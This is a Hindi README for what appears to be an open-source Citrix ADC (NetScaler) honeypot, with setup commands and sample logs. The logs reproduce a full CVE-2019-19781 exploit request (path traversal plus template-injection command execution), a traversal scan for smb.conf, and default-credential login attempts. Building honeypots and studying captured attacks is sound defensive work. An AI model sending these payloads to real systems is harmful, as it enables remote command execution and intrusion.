
Citrix ADC (NetScaler) हनीपॉट। CVE-2019-19781 और लॉगिन प्रयासों का पता लगाने का समर्थन करता है।

प्रीकंपाइल्ड Linux (x64) पैकेज यहाँ उपलब्ध है
mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz
यदि आपके पास Go वातावरण तैयार है:
go get github.com/x1sec/citrix-honeypot
स्व-हस्ताक्षरित प्रमाणपत्र जनरेट करें:
openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650
यह इतना आसान है:
./citrix-honeypot
हनीपॉट पोर्ट 80 और 443 दोनों पर सुनेगा (इसलिए इसे root यूज़र के रूप में चलाना होगा)
या इसे डिटैच करके बैकग्राउंड प्रोसेस के रूप में चलाने के लिए:
nohup ./citrix-honeypot &
परिणाम / डेटा ./log निर्देशिका में लिखा जाता है। ये हैं:
hits.log - सभी डेटा के साथ स्कैनिंग प्रयास और एक्सप्लॉइटेशन प्रयास (जैसे हेडर, पोस्ट बॉडी)
all.log - सर्वर तक पहुँचते हुए देखे गए सभी HTTP अनुरोध
logins.log - वेब इंटरफ़ेस पर लॉगिन के प्रयास
tlsErrors.log - अक्सर इंटरनेट स्कैनर पोर्ट 443 पर अमान्य डेटा भेजते हैं। HTTPS त्रुटियाँ यहाँ लॉग की जाती हैं।
पहला सार्वजनिक रूप से जारी एक्सप्लॉइट चलाना:
$ cat logs/hits.log
2020/01/23 08:27:55
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0
url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb
स्कैनिंग प्रयास:
$ cat logs/hits.log
2020/01/23 08:41:02
-------------------
Scanning detected ...
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0
लॉगिन प्रयास:
$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin